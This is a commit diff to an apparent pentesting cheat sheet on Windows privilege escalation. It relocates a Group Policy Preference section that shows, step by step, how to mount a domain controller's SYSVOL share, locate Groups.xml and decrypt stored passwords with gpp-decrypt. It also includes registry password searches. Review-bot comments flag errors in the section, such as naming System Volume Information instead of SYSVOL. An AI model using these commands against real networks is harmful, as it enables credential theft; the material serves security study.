Commit 56220a7a authored by bobloblaw's avatar bobloblaw

Update privilege_escalation_windows.md

parent 7e8dd418
+45 −35
@@ -94,41 +94,6 @@ reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

### Group Policy Preference

If the machine belongs to a domain and your user has access to **System Volume Information** there might be some sensitive files there.

First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the envronment-variables

```
# Output environemtn-variables
set

# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=WHATEVER.LOCAL

# Look up ip-addres
nslookup nameofserver.whatever.local

# It will output something like this
Address:  192.168.1.101

```



gpp-decrypt

Look for the file **Groups.xml**. It might be encrypted the password. But the encryption.key can be found on windows homepage. Other interesting files here might be

```
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
```

## Internal/Hidden Services

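Review bot: the removal here drops the only sentence explaining why the password in Groups.xml can be recovered at all (`But the encryption.key can be found on windows homepage`, i.e. the AES key used for the cpassword attribute is published by Microsoft), and the moved copy of the section later in this commit does not restore it; suggest carrying a corrected version of that sentence over so the reader knows `gpp-decrypt` works because the key is public, not because of a weak password. The lead-in `Other interesting files here might be` is also removed while the file list it introduces is kept in the moved section, so that list should take its introductory sentence with it.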
@@ -374,6 +339,51 @@ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevat

http://toshellandback.com/2015/11/24/ms-priv-esc/

## Group Policy Preference

If the machine belongs to a domain and your user has access to **System Volume Information** there might be some sensitive files there.

First we need to map/mount that drive. In order to do that we need to know the IP-address of the domain controller. We can just look in the envronment-variables

```
# Output environemtn-variables
set

# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=WHATEVER.LOCAL

# Look up ip-addres
nslookup nameofserver.whatever.local

# It will output something like this
Address:  192.168.1.101

# Now we mount it
net use z: \\192.168.1.101\SYSVOL

# And enter it
z:

# Now we search for the groups.xml file
dir Groups.xml /s
```

If we find the file with a password in it, we can decrypt it like this in Kali

```
gpp-decrypt encryptedpassword
```


```
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
```


## Escalate to SYSTEM from Administrator
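Review bot: the first sentence of the moved section still says the user needs access to **System Volume Information**, but the commands that follow mount `\\192.168.1.101\SYSVOL`; System Volume Information is a hidden local NTFS folder unrelated to Group Policy, while SYSVOL is the domain controller share that holds the policy XML files, so the sentence should name SYSVOL. Two smaller points: `gpp-decrypt encryptedpassword` should state that the argument is the value of the `cpassword` attribute inside Groups.xml (the text only says "a password"), and the trailing list of Services.xml, ScheduledTasks.xml, Printers.xml, Drives.xml and DataSources.xml lost its lead-in sentence in the move and now reads as an orphaned block; it needs a line such as "Other GPP files that can carry a cpassword" before it. The nslookup step is not strictly required either, since `net use z: \\NAMEOFSERVER\SYSVOL` resolves the name directly. Typos in the added lines: `envronment-variables`, `environemtn-variables`, `ip-addres`.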